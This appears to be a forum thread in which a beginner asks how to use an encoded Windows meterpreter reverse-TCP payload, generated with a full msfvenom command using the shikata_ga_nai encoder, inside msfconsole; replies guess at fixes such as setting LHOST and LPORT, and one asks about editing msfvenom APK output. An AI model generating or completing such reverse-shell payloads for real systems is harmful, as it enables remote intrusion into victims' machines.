Forum Thread: Question About MSF and MSFVenom

Whenever I generate an encoded payload, I use the payload "-p windows/meterpreter/reverse-tcp", I save it as "-o filename.rb" with "-f ruby" and encoder "-e shikata-ga-nai", bad chars to avoid is "-b '/x00' ".

So full code is: "msfvenom -p windows/meterpreter/reverse-tcp -e shikata-ga-nai -i 3 -b '/x00' -f ruby -o filename.rb". (Note that '-' (dash) is underscore, but it messes up my post.)

How can I use this custom ruby script as my payload in msfconsole?
Btw. The only output in the file 'filename.rb' contains the buff/bad chars.

9 Responses

Thanks for the link! I'll check it when I'm at home, but expect some new question(s) hahaha

Okay I have generated a payload using msfvenom, but it only contains "buf" with a lot of bad chars after it.

Maybe your custom ruby script has something missing?? Or you didn't write the command to generate the payload properly... check that once.. just see all the options once that are required to be provided...

That's all I know right now, so just ignore me if you think I'm saying rubbish lol ;);)... anyway.. still wait for an expert!!

I think I am trying to accomplish something impossible. I'm gonna create a detailed thread about it.

Nothing's impossible bro... keep on trying... you'll get it right...
(Well actually not everything ;);))

Not sure, but did you miss some options? When you make reversetcp you should specify LHOST and LPORT. Or am I wrong? :)

Actually you're right... with msfvenom you gotta specify those

I just want to know, is it possible to edit the apk output of msfvenom?
